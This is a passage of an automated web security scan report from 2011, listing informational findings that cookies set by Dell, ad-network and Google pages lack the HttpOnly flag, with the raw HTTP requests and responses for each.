Host: 142.xg4ken.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 16:18:39 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564; expires=Sat, 03-Dec-2011 16:18:39 GMT; path=/; domain=.xg4ken.com
Location: https://h41183.www4.hp.com/inflexion/?country=US&language=US&campaigncode=inflexion&jumpid=inflexion&k_clickid=AMS|200d2a28-23e9-a048-8372-00005235d564
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


11.19. http://accessories.us.dell.com/sna/DellPartsFamily.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /sna/DellPartsFamily.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sna/DellPartsFamily.aspx HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 76867
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:06 GMT; path=/
Set-Cookie: StormSCookie=bandwidth=NA&js=1&flashversion=10; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:05 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Dell C
...[SNIP]...

11.20. http://accessories.us.dell.com/sna/ShopAllBrands.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /sna/ShopAllBrands.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sna/ShopAllBrands.aspx HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 165178
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:26 GMT; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:25 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Shop B
...[SNIP]...

11.21. http://accessories.us.dell.com/sna/batteryconfig.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /sna/batteryconfig.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sna/batteryconfig.aspx?c=us&cs=04&l=en&s=bsd HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23838
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:19 GMT; path=/
Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:18 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Batter
...[SNIP]...

11.22. http://accessories.us.dell.com/sna/category.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /sna/category.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sna/category.aspx?category_id= HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33223
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: StormSCookie=~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
Set-Cookie: lwp=c=us&l=en&s=dhs&cs=19; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:14 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Electr
...[SNIP]...

11.23. http://accessories.us.dell.com/sna/category.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /sna/category.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sna/category.aspx?c=us&l=en&s=dhs&category_id=5914&cs=19 HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 122314
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|dhs|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:18 GMT; path=/
Set-Cookie: StormPCookie=bandwidth=NA&js=1&rpo_snp=A4186752,A4186751,A4186750; domain=.dell.com; expires=Sat, 04-Sep-2021 16:29:19 GMT; path=/
Set-Cookie: lwp=c=us&l=en&s=dhs&cs=19; domain=.dell.com; path=/
Set-Cookie: StormSCookie=~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:19 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>TVs -
...[SNIP]...

11.24. http://accessories.us.dell.com/sna/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /sna/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sna/default.aspx?c=us&l=en&cs=04 HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 88780
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:31 GMT; path=/
Set-Cookie: StormPCookie=bandwidth=NA&js=1&rpo_snp=320-2676,320-9511,320-1748,320-9321; domain=.dell.com; expires=Sat, 04-Sep-2021 16:29:31 GMT; path=/
Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:30 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Comput
...[SNIP]...

11.25. http://accessories.us.dell.com/sna/memconfig.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /sna/memconfig.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sna/memconfig.aspx HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 30746
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:58 GMT; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:58 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Comput
...[SNIP]...

11.26. http://accessories.us.dell.com/sna/printersupplies.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /sna/printersupplies.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sna/printersupplies.aspx?c=us&cs=04&l=en&s=bsd&seg=bsd&step=4&~ck=mn HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 34551
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:22 GMT; path=/
Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/
Set-Cookie: StormSCookie=~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:22 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Printe
...[SNIP]...

11.27. http://accessories.us.dell.com/sna/productdetail.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /sna/productdetail.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sna/productdetail.aspx HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 149
Content-Type: text/html; charset=utf-8
Location: /sna/productnotfound.aspx?
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:44 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:44 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fsna%2fproductnotfound.aspx%3f">here</a>.</h2>
</body></html>

11.28. http://accessories.us.dell.com/sna/sna.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /sna/sna.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sna/sna.aspx?c=us&cs=04&l=en&s=bsd&~topic=printer_shopall_inkjets&~ck=mn&~ck=mn HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 53137
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:29:25 GMT; path=/
Set-Cookie: lwp=c=us&l=en&s=bsd&cs=04; domain=.dell.com; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:25 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>Shop a
...[SNIP]...

11.29. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=493219&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.radware.com/gag=2157798556&gclid=CLjykYz_g6sCFQwaQgodAQy8yw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; ih="b!!!!#!.`.U!!!!#=3H3k"; vuday1=Gf(n`!#nf>Z-B7g; bh="b!!!#%!!-O3!!!!#=3G@^!!Os7!!!!#=3G@^!!`4x!!!!$=3Ef#!!jBx!!!!#=2srH!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:48 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!#'!!-O3!!!!#=3G@^!!Os7!!!!#=3G@^!!`4x!!!!$=3Ef#!!i9U!!!!$=3O-J!!jBx!!!!#=2srH!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P"; path=/; expires=Tue, 03-Sep-2013 16:19:48 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Sun, 04 Sep 2011 16:19:48 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

11.30. https://adwords.google.com/um/StartNewLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /um/StartNewLogin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /um/StartNewLogin HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: SAG=EXPIRED;Path=/;Expires=Mon, 01-Jan-1990 00:00:00 GMT
Location: https://www.google.com/accounts/ServiceLogin?service=adwords&hl=en&ltmpl=adwords&passive=true&ifr=false&alwf=true&continue=https://adwords.google.com/um/gaiaauth?apt%3DNone
X-Invoke-Duration: 10
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:28:56 GMT
Expires: Sun, 04 Sep 2011 16:28:56 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/accounts/ServiceLogin?s
...[SNIP]...

11.31. http://apr.lijit.com///www/delivery/ajs.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apr.lijit.com
Path:   ///www/delivery/ajs.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET ///www/delivery/ajs.php?zoneid=128348&username=w3schools&numAds=1&premium=1&eleid=lijit_region_128348&abf=true&tid=128348_1315189911632f25086dd2955&lijit_kw=&cb=6227196357&flv=10.3.183&time=21:31:51&ifr=1&loc=http%3A//www.w3schools.com/jsref/tryit.asp%3Ffilename%3Dtryjsref_doc_writeln&referer=http%3A//www.w3schools.com/jsref/tryit.asp%3Ffilename%3Dtryjsref_doc_writeln HTTP/1.1
Host: apr.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/tryitbanner.asp?secid=tryjs&rnd=0.9388239
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; OABLOCK=785.1315189866; OACAP=785.3; OASCAP=785.3; ljt_csync=rtb_turn%2Crtb_simplifi%2Crtb_mmath%2C1; _OACAP[785]=1; _OASCAP[785]=1; _OABLOCK[785]=1315189871; ljt_reader=9a524261efe1e1588396f48f16471b3c

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:31:20 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n20 ( lax-agg-n44), ms lax-agg-n44 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Content-Length: 12257
Content-Type: application/x-javascript; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Set-Cookie: _OABLOCK[785]=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[354]=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[785354]=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[63]=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[78563]=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785]=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:31:19 GMT; path=/; domain=.lijit.com
